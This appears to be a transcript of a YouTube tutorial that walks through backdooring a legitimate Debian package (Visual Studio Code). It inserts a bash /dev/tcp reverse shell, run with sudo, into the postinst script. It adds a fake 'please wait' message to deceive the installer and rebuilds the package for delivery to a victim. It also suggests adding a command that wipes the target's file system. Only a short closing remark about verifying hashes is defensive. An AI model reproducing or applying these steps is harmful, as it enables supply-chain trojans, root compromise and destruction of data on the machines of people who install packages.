Hello everyone, welcome back to my YouTube channel. And in today's video, I'll be showing you how to inject or embed a malicious code into a legitimate Debian package. So first things first, you actually need to download the Debian package you want to use. Um, so you can download any Debian package, but for this tutorial, we're using just the Visual Studio Code. So you can actually visit the website or just download any Debian package, from the official website. Then you can just from here download any deb package. So we can download the Visual Studio Code in the deb format, which I have downloaded already. So uh, so now I'm just going to copy it. Then the code, and I'm going to copy to this templates directory because this is where I'll be working. Now, after you've downloaded your Debian package, the first thing you need to do is to extract the content of the deb package. So you can do this using dpkg, then x, then the name. Then I'm going to give it a new directory. So you can just name it code underscore pack or anything. So we now have it extracted. So you can just ls code. Sorry, let's go back. So you can see we have a lot of subdirectories. So I'm just going to opt out. Yeah, so what we need to do now is we need to extract. We need a control file. So and to extract the control file from the deb package, we can use dpkg. Sorry, not dpkg. arx, then the name of the Debian package. So now we have it, and we can see we have the control file alongside other files. So what I can do now is just to we need to extract this control file. So I'll extract, then we are done. So I'm going to change to control. So we'll be making use of this postings file. So depending on the package you download, you might not see the postings file, and it can just be it might be just the control file you see. So you can just create a new postings file, which I'm going to show you. So if you don't have the postings file, then you create one. But the next thing you need to do is just to within this directory I extracted the package to previously. We need to make a new directory, then name it Debian. Then I'm going to copy both the control and the postings file because we'll be making use of this postings file to embed our payload or our code. So I'll copy this control, then I'm going to copy to Debian. Now doing the same thing for the postings file. And just change back, then I'll change now. So as I said, if you have just the control file, you can copy the control file here, then just create a new postings file within this Debian directory. And I think, well, we can read the content of the control file. We really don't have much, but I think to compile or to build back the package, I think it needs this control file, and it's not going to work. But we can just copy the control file, in case. So we'll be working with this postings file. So if you don't have one, you can create. So the first thing you need to do is just to we can edit the content of the file. And you can see this is a bash script. So you can inject the payload anywhere within the script. Just be careful of where you're injecting. I'll be injecting here. So you can just type I on your keyboard because I'm using Vim. So now we need to write our code. Just write bash I, then dev TCP, then the IP address of your machine. Then you need to confirm the IP address of your machine. IPA, then 157. So 157, then the port I'll be using will be like 2023. Then so now once the target executes this package, we're going to get a reverse bash shell. So but if you want to escalate privilege to the root or as the root user or to the root directory, you can just add sudo, at the front. Then this is going to escalate. This is going to run the package as sudo, and we get the shell as a root user. So it can be kind of tricky though, because actually when I tried it, if you run this deep while installing the package, while the target installs the package, it is going to pause because this is being executed. So until you terminate the connection. So one thing you can do to just keep the user waiting is just to add, let's say a message. So you see the reason. So you can just type echo, then just put a message. Please wait. Please wait. Take some time to install, just to keep the user waiting. So I'm going to show you why. Then after that, you can press escape, then colon write script. So I don't know what's happening. So just to confirm. Alright, so we have it. Take some time to install. So now we can just change the permission to 755 for the postings file, then same as control, save for control. You can confirm using NSL. And you can see the permission. Alright, so the next thing we need to do is we need to build the package. So you can use sudo. Let me just try it out sudo first. You can use cdpkg deb, then build the directory code pack. Then it's going to take some time. Yeah, so after building, we can actually see the package that's been built. So this is the package we send it to the victim. So we can actually use let's say netcat without wasting time. You can just use Python server. Then I'm just going to get this. Paste it. Could not connect to server. Okay. Yes, 1000. Alright, so we have it. So I'm going to terminate this. What we can actually do is we can set up a list now. So you can do 2023 with the ports we used. So on the target system, the target we want to install the package. So you can just install the package in dpkg, then I to install then the package. So I just wait. Oh, sorry, I downloaded the wrong file. So I'm just going to remove this. I downloaded the wrong. I'm going to remove this. Uh, then I'm going to host the server again. So this was the one we built. So when we have our netcat listener still active, so you can just install the package again. So I'm just going to terminate this Python. So we can see the message, please wait, this might take some time. Then if you visit our system, we should see you have a shell to the root account. If you type ls, you can see the files. And you can do anything malicious with it. You can decide to delete everything or delete the whole file system if you wish. And the funniest thing is, if the target tries to, terminate the installation by pressing Ctrl C, it's not going to work. You see, it's not going to work. So with this message, please wait. This might take some time. It's going to give the target hope that this thing is still installing, while you can still be doing whatever you want to do with the system. So within the same code, you can actually add a script that would delete the old file system while the target is installing this package. I don't even understand. Now, just the same with generated this message. You can just add a script that will be like, that will say sudo remove this. So when the target executes or installs this package, it's going to remove, it's going to delete everything within the, it's going to delete the old Linux file system. So that's just the way to crash the target system. So you press Ctrl C, it's not going to work. It's not going to work. So until the attacker terminates the connection, you can see you can just do anything. You can change to root. You can see who am I, whatever you call it. You can see we are root. So until I terminate this connection with maybe exit or Ctrl C, then it is going to return back to its normal state. Then continue installing. So what you can just do is, like, you want to be safe from this type of attack, you can just verify the hash of the file you just downloaded of the Debian package. So that is why you must download from the right source. So you can just do md5 some then code, which is going to give you the md5 sum of the package. So if the website has the hash of the file, you can just compare. If there's anything strange, or if they are not the same, you should also know that maybe it has been altered, or there's a form of malicious script. And also don't leave your system open. This can be done locally. If you leave your system open, someone can just have access to your system, then embed the code, then while you install, it's going to create a remote shell. So that'll be all for this video. I hope you enjoyed it, and thanks for watching. If you enjoyed it, please consider liking and subscribing.